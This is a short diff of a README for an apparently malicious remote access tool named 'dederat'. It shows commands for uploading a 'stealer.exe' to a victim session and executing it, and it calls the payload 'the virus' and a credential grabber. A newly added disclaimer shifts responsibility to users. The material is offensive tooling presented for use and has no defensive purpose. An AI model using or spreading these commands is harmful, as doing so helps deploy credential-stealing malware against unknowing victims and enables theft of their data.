aylakadamsonuyok/dederat/README.md

 You can upload ```dede upload (upload a stealer.exe) si:<session-id>``` a stealer and run ```dede execute path/of/stealer.exe si:<session-id>``` the virus because my grabber is so bad :(

+# Disclaimer:

+I do not accept responsibility for anything done with this tool, the responsibility lies with the person using the tool.

 # Thanks To :

 - LydexCoding